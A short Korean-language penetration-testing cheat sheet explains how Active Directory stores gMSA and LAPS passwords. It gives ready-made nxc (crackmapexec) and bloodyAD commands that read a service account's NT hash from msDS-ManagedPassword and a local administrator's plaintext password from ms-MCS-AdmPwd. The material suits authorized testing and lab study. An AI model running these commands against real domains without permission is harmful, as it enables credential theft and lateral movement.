GMSAPassword
개념
- 서비스 계정의 패스워드를 AD가 자동으로 관리하는 시스템
- 주기적으로 패스워드가 자동 변경된다
ReadGMSAPassword 권한이 있는 계정만 패스워드를 읽을 수 있다.- 서비스 계정의
msDS-ManagedPassword 속성에 본인의 NT 해시가 저장되고 관리된다.
Command
1. nxc (crackmapexec)
nxc ldap '$target_ip' -u '$username' -p '$password' --gmsa
- 성공 시, 타겟 계정의
NT Hash 를 얻을 수 있다.
2. bloodyAD
bloodyAD --host '$target_ip' -d '$target_domain' -u '$username' -p '$password' get object '$target_account' --attr msDS-ManagedPassword
LAPSPassword
개념
- 로컬 관리자의 패스워드를 AD가 자동으로 관리하는 시스템
- GMSAPassword와 유사하지만, LAPSPassword는 로컬 관리자의 패스워드를 특정 컴퓨터 계정에 저장하고 관리하는 차이가 있다.
- 컴퓨터 계정의
ms-MCS-AdmPwd 속성에 로컬 관리자의 평문 비밀번호를 저장한다.
Command
1. nxc (crackmapexec)
nxc ldap '$target_ip' -u '$username' -p '$password' -M laps
2. bloodyAD
bloodyAD --host '$dc_ip' -d '$domain' -u '$username' -p '$password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
References